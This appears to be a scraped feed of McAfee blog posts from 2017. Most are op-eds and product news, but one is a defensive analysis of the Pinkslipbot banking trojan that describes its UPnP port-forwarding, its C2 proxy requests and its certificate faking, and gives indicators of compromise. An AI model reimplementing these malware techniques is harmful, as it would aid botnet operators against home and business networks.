Additionally, the threat actors used a custom DDoS tool that exploited a flaw, classified under CVE-2015-5374, to render Siemens SIPROTEC devices unresponsive. They also used a custom port scanner to map the target’s network and a custom data wiper to make the infected Windows devices crash and to complicate incident response for IT security analysts.

What next? The good news is: known malicious samples are detected in the latest DATs by McAfee ENS and Web Gateway. Plus, Microsoft has patches available. Make sure to keep Windows systems and ICS devices up to date. Additionally, the malware can be detected if utility companies monitor their networks for abnormal traffic, including looking for signs that the malware is searching for the location of substations or sending messages to switch.

To stay up-to-date on this cyberthreat and others like it, make sure to follow @McAfee and @McAfee_Business.

The post Crash Override Malware Can Automate Mass Power Outages appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/crash-override-malware-can-automate-mass-power-outages/feed/ 0
McAfee Discovers Pinkslipbot Exploiting Infected Machines as Control Servers; Releases Free Tool to Detect, Disable Trojan https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-discovers-pinkslipbot-exploiting-infected-machines-as-control-servers-releases-free-tool-to-detect-disable-trojan/ https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-discovers-pinkslipbot-exploiting-infected-machines-as-control-servers-releases-free-tool-to-detect-disable-trojan/#respond Fri, 16 Jun 2017 19:11:20 +0000 https://securingtomorrow.mcafee.com/?p=75053 McAfee Labs has discovered that banking malware Pinkslipbot (also known as QakBot/QBot) has used infected machines as control servers since April 2016, even after its capability to steal personal and financial data from the infected machine has been removed by a security product. These include home users whose computers are usually behind a network address …

The post McAfee Discovers Pinkslipbot Exploiting Infected Machines as Control Servers; Releases Free Tool to Detect, Disable Trojan appeared first on McAfee Blogs.

]]>
McAfee Labs has discovered that banking malware Pinkslipbot (also known as QakBot/QBot) has used infected machines as control servers since April 2016, even after its capability to steal personal and financial data from the infected machine has been removed by a security product. These include home users whose computers are usually behind a network address translation router. To do so, Pinkslipbot uses universal plug and play (UPnP) to open ports, allowing incoming connections from anyone on the Internet to communicate with the infected machine. As far as we know, Pinkslipbot is the first malware to use infected machines as HTTPS-based control servers and the second executable-based malware to use UPnP for port forwarding after the infamous W32/Conficker worm in 2008.

Pinkslipbot is a notorious banking-credential harvester that has been active since 2007. It primarily targets users and enterprises located within the United States and includes components for password stealers, keyloggers, and man-in-the-browser attacks that are used as vectors to steal various kinds of information—including credit cards, social security numbers, online account credentials, email passwords, digital certificates, etc. Pinkslipbot controls a large botnet of more than 500,000 infected machines and steals over a half-million records every day. As a result, this malware has been documented extensively by the antimalware industry. The malware authors are clearly benefiting from Pinkslipbot; they have maintained the code base since 2007 and regularly add new features to it.

When Pinkslipbot resurfaced in December 2015, we analyzed the samples and published our findings at the Virus Bulletin Conference (VB2016) in October 2016. That report described its use of “ATSEngine” to automatically transfer money from bank accounts that belonged to infected users. At the time, Pinkslipbot was equipped with a domain generation algorithm with antisinkhole capabilities to locate its control server. After April 26, 2016, the malware sidelined the algorithm as a backup option in favor of a list of control server IP addresses embedded within every sample. Because many of the IP addresses belonged to legitimate organizations, we believed the malware authors intentionally included them to deter the cybersecurity industry from blacklisting all IP addresses en masse.

Turns out we were wrong in that assessment. We have discovered that the list of IP addresses consists solely of infected machines that serve as HTTPS-based proxies to the actual control servers. This setup (shown in the following diagram) is used to mask the real IP addresses of the Pinkslipbot control servers.

Figure 1: Layout of a typical Pinkslipbot control server.

Our VB2016 paper also showed how all server components (control server, JavaScript-download server, exploit kit servers) were interchangeable and contained the same functionality. This information continues to hold true with this new discovery. All control server-related information described as follows has been observed on other server components used by Pinkslipbot.

From infected machine to control server proxy

The exact procedure of determining whether an infected machine is eligible to be a control server proxy is unknown. However, we believe this decision depends on an infected machine’s satisfying a combination of three factors.

  • IP address located in North America
  • High-speed Internet connection
  • Capability to open ports on an Internet gateway device using UPnP

To gauge the Internet connection speed, the malware downloads an image from Comcast’s Speed Test service from four locations in the United States.

  • http://sanjose.speedtest.comcast.net/speedtest/random750x750.jpg?x={random}&y=1
  • http://boston.speedtest.comcast.net/speedtest/random750x750.jpg?x={random}&y=1
  • http://jacksonville.speedtest.comcast.net/speedtest/random750x750.jpg?x={random}&y=1
  • http://houston.speedtest.comcast.net/speedtest/random750x750.jpg?x={random}&y=1

Once the downloads are complete, the results of the speed test are sent to the control server.

The Pinkslipbot binary then uses the miniupnpc library to issue a Simple Service Discovery Protocol packet and look for the following UPnP devices:

  • urn:schemas-upnp-org:device:InternetGatewayDevice:1
  • urn:schemas-upnp-org:service:WANIPConnection:1
  • urn:schemas-upnp-org:service:WANPPPConnection:1
  • upnp:rootdevice

Figure 2: Pinkslipbot’s device discovery over the Simple Service Discovery Protocol.

Once devices are discovered, their descriptions are downloaded to look for Internet gateway devices (IGD). This is done by looking for the service type urn:schemas-upnp-org:service:WANCommonInterfaceConfig: in the device description. The IGD is then checked for connectivity (for example, by calling the GetStatusInfo function on the device and confirming the returned response is “Connected”) and the external IP address is retrieved using the GetExternalIPAddress() function on the device.

Once an IGD is discovered, port-forwarding rules are created by using the AddPortMapping function on the IGD.

Figure 3: Disassembled code showing port mapping functionality.

The malware attempts to port-forward 27 internal and external ports, listed below.

  • 443*
  • 465*
  • 990*
  • 993
  • 995*
  • 1194
  • 2078*
  • 2083
  • 2087
  • 2222*
  • 3389
  • 6881
  • 6882
  • 6883
  • 8443*
  • 32100
  • 32101
  • 32102
  • 32103*
  • 50000
  • 50001
  • 50002
  • 50003
  • 50010
  • 61200*
  • 61201*
  • 61202

The ports marked with a * are currently in use (as of June) by Pinkslipbot control servers.

If any port-forwarding request succeeds (and if other open ports are found), the malware saves the port number into a buffer and removes the port-mapping rule. The port-forwarding results are submitted to the control server using an HTTP POST request:

URL: hxxps://{control server-IP-Address}:{Port}/bot_serv
POST-DATA:
cmd=1&msg={obfuscated-string}&ports=993,80,465,21,50000,61200,61202

Based on this data, the malware author decides whether the infected machine can be used as a control server. Once an infected machine is selected, the “wgetexe” control server command (more accurately, command 25 using control server protocol Version 14) is issued to the infected machine to download a Trojan binary as “tmp_{timestamp}.exe.” This sample is responsible for the control server proxy communication, as we shall explain.

The downloaded Trojan is a dropper for the proxy component. It creates the following files either in %APPDATA% or %ALLUSERSPROFILE%, depending on the operating system.

  • HardwareMonitor\hardwaremonitor.dll
    • The proxy component
  • HardwareMonitor\hardwaremonitor.ini
    • Contains the Pinkslipbot BOTID stored under the field “n”
    • Contains available ports for mapping stored under the field “prt”

The file hardwaremonitor.dll (originally created as supernode_con.dll by the malware authors) is created as a new “hwmon” service launched via calling an export function (HwmonServerMainNT or HwmonServerMain) using rundll32.exe. A firewall rule is also created for rundll32.exe.

When launched as a service, the proxy component creates port-forwarding rules (using the description “NAT-PMP {port} tcp”) just as with the original Pinkslipbot sample but it does not remove them this time. The infected machine can now be used as a control server over HTTPS. The proxy component at this stage will contact the real control server via one of its hardcoded proxy servers with the following HTTPS POST request:

URL: https://{proxy-IP}/gwsup
POST-DATA:n={BOTID}&rt={IsWinNT}&prt={UPnP-Forwarded-Port}&os={OS-Version}&ver={MajVer}.{MinVer} &upnp_stat={UPnP-Status}&upnp_descr={UPnP-Port-Forward-Description}

Once the infected machine receives a control server request from a new Pinkslipbot infection, it routes all traffic to the real control servers via an additional proxy using the popular libcurl URL transfer library. As with the original malware, the responses from the real control servers are parsed and digital signatures verified using a hardcoded RSA public key (using the MatrixSSL library). To mask its presence to the outside world, responses from the real control servers (which run Apache) are modified to look like they were hosted on a server running nginx Version 1.9.12.

Figure 4: A fake server name used by Pinkslipbot.

This step agrees with our previous findings from the VB2016 paper, in which we saw an nginx server responding with a specific error message (see Page 6) during control server communication that indicated the presence of a curl-based proxy server residing on Pinkslipbot control servers. However, at the time we were not sure how this was implemented or where the curl component resided. The presence of the same error message in the proxy component DLL confirms its purpose for responding to control server requests.

Figure 5: The missing component from 2016 has been identified based on the error message.

Two custom HTTP headers are also passed to the hardcoded proxy servers to indicate the IP address of the infected machine making the request and the Pinkslipbot BOTID of the infected machine serving as the proxy server.

Custom HTTP Header: Description:
X-FORWARDED-FOR-CLIENT IP address of infected machine making a request.
X-FORWARDED-FOR-GATEWAY2 The Pinkslipbot BOTID of the infected machine serving as a control server proxy.

 

Because the Pinkslipbot control server protocol is based on HTTPS, it needs a server-side certificate to operate. It gains this on the fly by generating new self-signed certificates for every new connection using the OpenSSL library built with libcurl. The generated certificates are issued random values for the following certificate attributes:

Certificate Attribute: Description:
C Country
ST State
L Locality
STREET Street
O Organization
OU Organizational unit
CN Common name

 

Figure 6: Server certificate generation code from Pinkslipbot.

The malware authors take some extra effort to make the generated certificates appear legitimate by ensuring that:

  • The organization attribute ends with either Inc. or LLC.
  • The common name attribute uses one of the following top-level domains:
    • .com
    • .net
    • .org
    • .biz
    • .us
    • .info
    • .mobi

User recommendations

As UPnP assumes local applications and devices are trustworthy, it offers no security protections and is prone to abuse by any infected machine on the network. We have observed multiple Pinkslipbot control server proxies hosted on separate computers on the same home network as well as what appears to be a public Wi-Fi hotspot. The port-forwarding rules created by Pinkslipbot are too generic to remove automatically without risking accidental network misconfigurations. And as most malware do not interfere with port-forwarding, antimalware solutions may not revert such changes. Unfortunately, this means that your computer may still be vulnerable to outside attacks even if your antimalware product has successfully removed all Pinkslipbot binaries from your system. To ensure your computers are not unintentionally accessible from the Internet, we encourage you to download our free utility listed in the next section to look for Pinkslipbot control server proxy infections and remove malicious port mappings. Even without the UPnP elements, Pinkslipbot is still a dangerous Trojan capable of causing a lot of damage. A few years ago it gained attention for locking Active Directory while spreading over the network by brute-forcing network credentials. We recommend following the recommendations published in the McAfee Threat Advisory for W32/Pinkslipbot.

From a general cybersecurity perspective, we were surprised to see a banking Trojan use a complicated multistage proxy for HTTPS-based control server communication, especially considering that it uses UPnP to repurpose home user infections as control servers. Aside from a 2008 proof of concept created by security researchers and the W32/Conficker worm in 2009, information about malicious use of UPnP by malware is scarce. We expect this to change soon as more people use routers with built-in UPnP capabilities (enabled by default) than in 2008. Many Internet of Things devices work over UPnP and are steadily being installed and used by more people every day. As they become more ubiquitous, cybercriminals will see opportunities to use UPnP maliciously. We recommend that users keep tabs on their local port-forwarding rules and disable UPnP on their home routers unless they need it.

Pinkslipbot Control Server Proxy Detection and Port-Forwarding Removal Tool

If your system has been infected with W32/PinkSlipbot (Qakbot/QBot), your machine may still be serving as a control server proxy for the malware. Even if all malicious components have been removed by your security product, your computer may be vulnerable to attacks if it is accessible over the Internet. To help identify this vulnerability on your computer and network, we have developed a free port-forwarding detection and removal tool specific to this malware. This utility will also detect the Pinkslipbot control server proxy service if found and disable (though not remove) the service.

The tool can be downloaded here. By default, the tool operates in detect mode, in which no changes are made to your system or router configuration if malicious elements are found.

Figure 7: The McAfee Pinkslipbot Control Server Proxy Detection and Port-Forwarding Removal Tool operating in its default “detect only” mode.

If the tool finds malicious port-forwarding rules and malicious services, you may pass the “/del” command line argument to the tool to disable the malicious service and remove the port-forwarding rule.

 

 

Figure 8: McAfee Pinkslipbot Control Server Proxy Detection and Port-Forwarding Removal Tool operating in “detect and disable” mode.

Indicators of compromise

  • One or more of these files:
    • %APPDATA%\HardwareMonitor\hardwaremonitor.dll
    • %ALLUSERSPROFILE%\HardwareMonitor\hardwaremonitor.dll
    • %APPDATA%\HardwareMonitor\hardwaremonitor.ini
    • %ALLUSERSPROFILE%\HardwareMonitor\hardwaremonitor.ini
  • A service created with the name “hwmon” and binary path containing “rundll32.exe.”
  • TCP port forwards enabled for one of these ports using description “NAT-PMP {port} tcp” and no expiration time:
    • 443, 465, 990, 993, 995, 1194, 2078, 2083, 2087, 2222, 3389, 6881, 6882, 6883, 8443, 32100, 32101, 32102, 32103, 50000, 50001, 50002, 50003, 50010, 61200, 61201, 61202
  • Connections from and to these IP addresses:
    • 158.255.2.138
    • 185.162.8.190
    • 185.169.229.168

Sample hashes

  • Proxy component droppers
    • 22cf76f92aad53db1304dec026b834ad77d2272c7f2eaaabf299e953b98d570e
    • c23fe9f3a3035edb6fa306c7545cfd05bb310d85983dda5914cd9650c13b41d3
  • Proxy component DLL (internal name: supernode_con.dll)
    • 730e9864795ed8d6538064551ab95505dff3e92dd67888bee323cb341b2420c6
    • af25c5bed96e046ba1e25749ff51f0d8437a1ef66e469b4fd0348e372abc2f7f
    • 6d174dd4f29da814170e8f7c40ecd80794e1c27d8d94741a79bd1bd6eb75ea62

 

The post McAfee Discovers Pinkslipbot Exploiting Infected Machines as Control Servers; Releases Free Tool to Detect, Disable Trojan appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-discovers-pinkslipbot-exploiting-infected-machines-as-control-servers-releases-free-tool-to-detect-disable-trojan/feed/ 0
Grocery Industry’s Cybersecurity Challenges: Harbinger Of Threats To Corporate America https://securingtomorrow.mcafee.com/business/neutralize-threats/grocery-industrys-cybersecurity-challenges-harbinger-of-threats-to-corporate-america/ Fri, 16 Jun 2017 17:44:54 +0000 https://securingtomorrow.mcafee.com/?p=75222 Button up your overcoat; it’s about to rain cyberthreats   Few businesspeople have as much on the line every moment of every day as grocers. When disquieting events happen at a grocery store, customers can be more than just inconvenienced. In extreme circumstances, grocery products can be the cause of illness, even death. What makes …

The post Grocery Industry’s Cybersecurity Challenges: Harbinger Of Threats To Corporate America appeared first on McAfee Blogs.

]]>
Button up your overcoat; it’s about to rain cyberthreats  

Few businesspeople have as much on the line every moment of every day as grocers. When disquieting events happen at a grocery store, customers can be more than just inconvenienced. In extreme circumstances, grocery products can be the cause of illness, even death.

What makes the grocery industry so susceptible to calamities is that food is a necessity, not a luxury. Threats to food safety have the potential to create panic. If a company is the sole retailer affected, there’s a sobering chance it could lose customers – but perhaps only temporarily. The length of customers’ disaffection all depends on the effectiveness of the company’s response.

What constitutes an effective response? When it comes to cybersecurity, it’s not always easy to say. It’s scary, but data breaches, ransomware, malware, phishing and other cybersecurity issues are all still in their infancy. There are no widely accepted industry standards for incident response, leaving “reasonable” action in the eye of the beholder. One thing is for sure – the miracle of the Internet is being turned into weaponization by a myriad of bad actors.

The specter of malicious product tampering or computer hacks that prevent items from being properly refrigerated are among the risks that keep grocers awake at night. In many ways, they’re a microcosm of the pressures faced these days by corporate CEOs, communications executives, and their legal counsel. Fears surrounding cybersecurity and attendant liability nightmares have become Corporate America’s #1 risk management concern. For the past decade, the threat of hacking was largely limited to information. Now, life, health, and safety are becoming the real exposure, and few companies are ready, though all will face attacks. If a company thinks its prophylaxis is sufficient, it is wrong. If it thinks free credit reporting is still a satisfactory response, it is more unprepared than it realizes.

In early June, I was among the crisis response specialists invited to participate in a crisis management conference organized by Pillsbury Winthrop Shaw Pittman LLP. The panel was given a cybersecurity scenario that involved a ransomware breach disrupting customer transactions in dozens of stores across a nationwide chain.

The scenario cut right to the heart of the grocery industry’s biggest fear: the reputational impact of a liability or injury lawsuit stemming from a single incident, an episode whose repercussions could overwhelm decades of conscientious customer and community service.

Here’s the strategic premise I shared for grocery industry executives caught in the klieg lights: from the moment the crisis hits, their brand reputation hinges on empathetic communications that keeps their customers front and center. Yes, regulatory and legal liability will provide a threshold for them to respond, but their efforts to go above and beyond mere compliance will be what customers remember. As cybercrime gets more sophisticated, audiences from customers to shareholders expect a more fulsome response. “Hey, we are a victim, too,” will only get you so far, and less and less each day.

A company should frame its response through the prism of its customers – a young mom trying to get food for her children, or a son that needs to pick up medicine for his sick father, or a family living paycheck to paycheck.

Always act out of an abundance of compassion and caution, I counseled. Anticipate the health-and-safety questions customers are likely to have and develop emotionally resonant answers. Identify resourceful ways to make their lives easier. A response that surmounts basic regulatory requirements will cultivate good will and could win over lifelong customers.

With that in mind, I advised industry executives to use all channels available to communicate with consumers – from signage at store shelves to social media and online postings. They should also consider having employees outside each affected retail location to talk with customers as they arrive. Employees that are the face of the company are often best equipped to explain facts, answer questions, and collect insight about customer concerns.

Not only do grocery stores face the same cyberthreats that other retailers face, but they also have tremendous financial capital at risk if a significant event disturbs refrigeration or inventory systems. These additional operational systems must be considered in a company’s Incident Response Plan, just as they would be in Business Continuity planning for bad weather power outages.

It is imperative companies establish Business Continuity Plans, Incident Response Plans, and Crisis Communications Plans. Those plans should be examined against detailed risk assessments and help guide employee training. Plans should be validated through simulated exercises. This builds a culture where cybersecurity is a priority and employees understand their role in protecting the brand.

Tom Campbell, the head of Pillsbury’s crisis management practice and the host of the conference, warns that, “Failing to prevent a cyber breach will injure a company but failing to rapidly respond to the crisis that follows can kill it.”

Brian Finch, co-chair of Pillsbury’s Privacy, Data Protection, and Cybersecurity team, adds that, “Businesses of all stripes have to understand that today’s cyberthreats go well beyond simple ‘smash and grab’ data thefts. Their preparation, and by extension their legal exposure, must be attuned to stopping or minimizing the impact of cyberattacks that could slow or stop their revenue intake.”

Cyberattacks, data breaches, and information security issues have become so pervasive that people may generally forgive companies for a breach – but not for slipshod communications about it. And not for failing to take proactive measures to protect information and assets in the first place, whether it’s installing the latest patches or conducting security penetration tests.

Cybersecurity is not just a technology issue. It’s a risk management issue. Everyone in the company should understand the company’s objectives when it comes to cybersecurity and incident response. Employees are a critical first audience for security messaging and communications; it is inevitable that they will receive questions when an incident occurs.

When it comes to messaging to external stakeholders – from investors to industry analysts to consumers – the critical component is quick and consistent messaging. Telling key audiences what happened, what the company is doing to fix it, and what it is doing to prevent the episode from happening again is paramount.

The fact is that a company’s risk will never be zero. When it comes to cybersecurity and data breaches, the old axiom “Not if, but when” has never been more true.

Richard Levick, Esq., @richardlevick, is Chairman and CEO of LEVICK. He is a frequent television, radio, online, and print commentator.

 

This article was written by Richard Levick from Forbes and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Grocery Industry’s Cybersecurity Challenges: Harbinger Of Threats To Corporate America appeared first on McAfee Blogs.

]]>
Beware the next wave of cyber threats: IoT ransomware https://securingtomorrow.mcafee.com/business/neutralize-threats/beware-the-next-wave-of-cyber-threats-iot-ransomware/ Thu, 15 Jun 2017 19:56:42 +0000 https://securingtomorrow.mcafee.com/?p=75160 Ransomware has become one of the most serious cyber threats plaguing organizations. Today, all of us – from home users to corporations and government organizations – are trying to protect ourselves from encryption viruses. But we are ignoring the beginning of the next wave of ransomware attacks – aimed at encrypting IoT devices. These attacks …

The post Beware the next wave of cyber threats: IoT ransomware appeared first on McAfee Blogs.

]]>
Ransomware has become one of the most serious cyber threats plaguing organizations. Today, all of us – from home users to corporations and government organizations – are trying to protect ourselves from encryption viruses.

But we are ignoring the beginning of the next wave of ransomware attacks – aimed at encrypting IoT devices. These attacks can be much more dangerous given the omnipresent and extremely diverse nature of the Internet of Things.

Quite simply, there are some differences that make IoT ransomware more dangerous than the already widespread extortion viruses for desktops and smartphones.

IoT ransomware does not encrypt your data

The well-known and most active crypto viruses like Locky and Cerber lock down important files on infected machines. Their main strength is irreversibility – the victims are forced to either pay for obtaining the decryption key or say goodbye to their files in case there are no backups. It is usually assumed that files and important data have a value expressed in money, and this fact attracts cyber extortionists.

IoT devices often do not have any data at all. Some may think that ransomware authors are not interested in attacking IoT devices. It’s actually not so.

Instead of only locking some files, IoT viruses may lock and get complete control over many devices and even networks. IoT malware may stop vehicles, disconnect the electricity and even halt production lines. Such programs can do much more harm, and therefore hackers may demand much larger ransom amounts. This increases the attractiveness of the new underground market.

One could argue that IoT hacking can be stopped with a simple reboot. However, the incentive to pay extortionists does not result from irreversibility but rather from the volume and character of potential losses which may occur during the time you lose control over the system.

While the Internet of Things expands the possibilities of life-supporting devices like pacemakers or industrial systems such as pumping stations, the financial benefits of blocking IoT infrastructure and the damage from belated response will grow exponentially. Organizations that use the Internet of Things in industrial control systems are the most vulnerable. These include power plants, big automated production lines, etc.

Consumer IoT devices

Attacks on consumer IoT devices, including smart homes and connected cars, are already real. Researchers have shown how they can gain control of a connected thermostat through the use of malicious code and set the device to increase the temperature to the maximum, causing the owner to pay a ransom.

Let’s imagine you got into a connected car this morning and suddenly there is a message on the screen: “If you pay $500, I’ll let you get to work today.” It was impossible several years ago, but due to technological progress, such scenario does not look fantastic anymore.

Furthermore, IoT ransomware may steal important data and personal information, for example, from surveillance cameras connected to the network or from fitness gadgets and then blackmail people, threatening to publish their sensitive information.

Despite the fact that IoT devices often have serious security weaknesses, it is still premature to talk about the imminent ransomware threat for smart homes and connected cars. The wide variety of apps and devices created by thousands of manufacturers complicates extensive malware usage.

The IoT industry is highly fragmented these days. It lacks standardized approaches, common platforms and communication systems. It is tough to carry out mass attacks. Every time a compromise occurs, hackers only target a specific type of devices, which reduces the number of potential victims.

We can conclude that hackers’ benefits from attacking consumer IoT devices are currently small. But the situation is likely to change in the future as the Internet of Things is going to deeper penetrate into our homes and offices.

Industrial segment already facing high risks

We see an entirely different picture in the industrial segment of the Internet of Things. Industrial systems are already very attractive for cyber extortionists. This could be any relevant system that may affect the lives of thousands or millions of people and are extremely expensive to operate.

For example, several US hospitals have undergone a series of ransomware attacks recently. Normal workflow of the Hollywood Presbyterian Hospital was disrupted because of ransomware. Some patients had to be moved to other clinics, and doctors started to keep records the old fashioned way on paper.

If a hospital system is compromised, it puts the health of patients at risk. The likelihood is very high that the hospital will pay upon demand. An attack against critical infrastructure can be carried out successfully based on similar factors – if lives of people might be put in danger and time is pressing, the owners would often agree to pay up.

Power grids and power stations can be another important target for IoT malware. Their important role in the modern world was perfectly illustrated as far back as the Northeast blackout of 2003. It caused $6 billion in losses within several hours, affecting 55 million people. It wasn’t a cyber attack but a software failure. Today, hackers constantly scan the Internet for important and vulnerable networks, so energy companies should be prepared.

How to protect IoT systems from ransomware

Although there is no universal solution, many experts believe that the observance of certain guidelines and methodologies can help organizations and manufacturers better protect their IoT systems from ransomware.

One of the important points is the ability to remotely upgrade the firmware of smart devices. Safety is a journey, not a destination, and there are no connected devices that can stay safe forever. Therefore, a firmware update should be a very simple, effective and safe process.

The latter is particularly important since insecure update channels can become portals for the infection to come in. There are time-tested measures to eliminate this malware entry point, such as blocking the processor and firmware, as well as encrypting communication channels between devices.

A reliable authentication mechanism poses another important protection measure. You may encounter situations these days when devices are connected to the Internet without any authentication at all.

This paves the way for spoofing. If lack of authentication becomes a mass phenomenon, it will be possible to disable millions of devices. Spoofing is particularly dangerous when a server with millions of connected machines is infected.

To make intruders’ life much harder it is necessary to introduce reliable security certificate life-cycle management and standardize the code base of security systems. This will help reduce the number of attack vectors.

Of course, securing the Internet of Things remains an arduous task as the industry is only groping its way. Currently, online criminals are only beginning to weigh the risks and assess the opportunities and potential profitability of the new market.

Meanwhile, manufacturers and users are not too concerned about the possible threat. Perhaps this will change quickly after the first successful incidents of rogue monetization of IoT vulnerabilities. Hopefully, we will have time to prepare.

 

This article was written by David Balaban from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Beware the next wave of cyber threats: IoT ransomware appeared first on McAfee Blogs.

]]>
Raise a United Voice Against Cyberbullying: Stop Cyberbullying Day https://securingtomorrow.mcafee.com/consumer/raise-united-voice-cyberbullying-stop-cyberbullying-day/ https://securingtomorrow.mcafee.com/consumer/raise-united-voice-cyberbullying-stop-cyberbullying-day/#respond Thu, 15 Jun 2017 16:13:39 +0000 https://securingtomorrow.mcafee.com/?p=75152 What does Zoe Saldana have in common with Sonam Kapoor, other than the fact that they are both renowned actors? They have both faced bullying online. And due to the anonymity and sense of security offered by the internet, not just celebs but even ordinary people like you and I could be subjected to cyberbullying. …

The post Raise a United Voice Against Cyberbullying: Stop Cyberbullying Day appeared first on McAfee Blogs.

]]>
What does Zoe Saldana have in common with Sonam Kapoor, other than the fact that they are both renowned actors? They have both faced bullying online. And due to the anonymity and sense of security offered by the internet, not just celebs but even ordinary people like you and I could be subjected to cyberbullying.

Isn’t it time we stand together to put an end to it and say ‘Stop Cyberbullying’?

The digital world offers everyone a chance to connect with people, and voice their opinions. Unfortunately, some people misuse this privilege to harass others, victims could suffer from emotional disturbances or in extreme cases even fatalities.

Our children are the first generation of digital citizens and often, their posts and online actions make them easy targets for bullies so as parents, we need to guide them on social media etiquette, and also explain the threats of the virtual world to enable them to handle adverse situations.

Consider this:

  • According to the McAfee 2017 study “New Family Dynamics in a Connected World,” 49% of Indian parents have shown concerns about their child potentially interacting with a social predator or cybercriminal online.
  • The 2015 McAfee Teen Tween Technology report states that 43% of the children active on social media claim to have witnessed cruel behaviour on social networks. Almost one out of four (22%) of those active on social media claim to have been the victim of cyberbullying themselves

Are parents aware of cyberbullying? The good news is yes, they are, and most of those surveyed said they have discussed this issue with their children and follow their children on their social media networks. Having said that, there are still many parents who do not believe in monitoring their kids online. Children, especially teens, are quite vulnerable and prone to peer influence. They need guidance on handling cyberbullying and parental support is paramount. A confident child will usually not seek attention or approval among strangers online.  Kids who are bullies also need counselling and guidance, further stressing the need for parental supervision.

Sharing a few tips on creating a safer and inclusive online environment:

  1. Choose your friends with care. It’s easier for rude people and strangers to bully you. Be wary about accepting requests from strangers. Never give out your cell phone number and email address, and never reveal passwords even to close friends.
  2. Mind what you share: What you say and how you say it, makes a difference. Also, keep personal information private. By refusing to use privacy settings, your profile is open to anyone and everyone, which increases the chances of being bullied or personal photos being downloaded and manipulated
  3. Be positive and don’t react: Don’t lose your calm and react- this what cyberbullies want. You should take measures after careful deliberations.
  4. Ignore, block or unfriend those who provoke or humiliate you. Block and report abusers by clicking on the ‘report abuse’ icon. If the issue persists, you can always take help from your parents in resolving the same
  5. If you are cyberbullied, share your experience with people you trust. Unburdening helps you to get good tips and the support proves invaluable to regaining emotional strength. Reach out to your parents or close peers at the first sign of bullying or conflict online.

Quick tips for parents to help them be on the top of things

Talk to your kids, frequently and frankly: This is THE most important thing to do to help you stay aware of what’s happening in your child’s virtual life and for them to feel free to confide in you. You can use role playing with real life situations to help kids learn how to respond to online bullies.

Monitor and mentor kids until they are mature enough to handle online issues on their own.

We are part of the #STOPCYBERBULLYINGDAY campaign because we are committed to a positive and all-inclusive culture in the virtual world. McAfee security solutions like McAfee Total Protection and McAfee LiveSafe offer parental control feature to help parents remotely monitor their kids. This is an excellent way to monitor, guide and keep them safe online.

Raise a united voice against cyberbullying by joining a Twitter campaign on 16th June. Use the hashtag #STOPCYBERBULLYINGDAY to share your views, tips and stories on cyberbullying and mark your solidarity with the movement.

The post Raise a United Voice Against Cyberbullying: Stop Cyberbullying Day appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/raise-united-voice-cyberbullying-stop-cyberbullying-day/feed/ 0
McAfee Public Cloud Server Security Suite Paid AMI Now on AWS Marketplace https://securingtomorrow.mcafee.com/business/mcafee-public-cloud-server-security-suite-paid-ami-now-aws-marketplace/ https://securingtomorrow.mcafee.com/business/mcafee-public-cloud-server-security-suite-paid-ami-now-aws-marketplace/#respond Thu, 15 Jun 2017 16:00:06 +0000 https://securingtomorrow.mcafee.com/?p=74449 A new Paid Amazon Machine Image (AMI) for McAfee Public Cloud Server Security Suite (McAfee PCS) is now available on an hourly basis on the Amazon Web Services (AWS) Marketplace. The Paid AMI is a flexible option for protecting AWS workloads since there’s no need to estimate usage and obtain a license before getting started. …

The post McAfee Public Cloud Server Security Suite Paid AMI Now on AWS Marketplace appeared first on McAfee Blogs.

]]>
A new Paid Amazon Machine Image (AMI) for McAfee Public Cloud Server Security Suite (McAfee PCS) is now available on an hourly basis on the Amazon Web Services (AWS) Marketplace. The Paid AMI is a flexible option for protecting AWS workloads since there’s no need to estimate usage and obtain a license before getting started.  You may want to explore McAfee PCS (Paid AMI) for AWS security if you:

  • Prefer an OpEx “pay-as-you-go” pricing model
  • Have spiky (variable) sizing and timing requirements for your workloads that are difficult to estimate
  • Want to test drive McAfee PCS before purchasing a license from McAfee.

With AWS, you are participating in a shared responsibility security model where AWS is responsible for securing underlying infrastructure and you are responsible for securing your workloads and configuring platform security. McAfee PCS provides visibility and protection to keep AWS deployments safe. Comprehensive protection starts at just $0.1 per hour.

Our new McAfee PCS PAID AMI is designed to help enterprise and government AWS customers quickly secure their Amazon workloads with foundational security consisting of:

  • Cloud workload discovery and monitoring
  • Antimalware
  • Host-based firewall
  • Host intrusion prevention.

White listing, file integrity monitoring and change prevention are also available to help protect high-risk environments and meet regulatory compliance. McAfee PCS protection scales elastically with your Amazon workloads for continuous protection.

 

Cloud Workload Discovery provides end-to-end visibility into all cloud workloads

What do I get from using McAfee PCS to protect AWS workloads?  

  • Faster threat detection (as shown in the screen shot above) through insights into weak security controls for cloud workloads, unsafe firewall settings, unencrypted volumes and indicators of compromise such as suspicious traffic
  • Quick and easy remediation using McAfee ePolicy Orchestrator or your favorite DevOps tools such as Amazon OpsWorks, Chef, or Puppet
  • Defense against emerging and advanced threats with malware scanning and intrusion prevention
  • Protection from advanced persistent threats without requiring signature updates or labor-intensive list management
  • Prevention of change activity that can lead to security breaches, data loss, and outages
  • Easier achievement and demonstration of regulatory compliance

Get Started

Start at no cost with a free trial! Click here to visit the AWS Marketplace.

 

 

The post McAfee Public Cloud Server Security Suite Paid AMI Now on AWS Marketplace appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-public-cloud-server-security-suite-paid-ami-now-aws-marketplace/feed/ 0
How to avoid a disastrous recovery https://securingtomorrow.mcafee.com/business/optimize-operations/how-to-avoid-a-disastrous-recovery/ Wed, 14 Jun 2017 17:58:08 +0000 https://securingtomorrow.mcafee.com/?p=75107 Every chief information officer speculates on the health and resiliency of their data center to ensure the continuity of their business in the event of a disaster. Many go as far as to hold periodic tests to discover and mitigate vulnerabilities. Netflix has gone even further by introducing testing in the form of their Simian …

The post How to avoid a disastrous recovery appeared first on McAfee Blogs.

]]>
Every chief information officer speculates on the health and resiliency of their data center to ensure the continuity of their business in the event of a disaster. Many go as far as to hold periodic tests to discover and mitigate vulnerabilities.

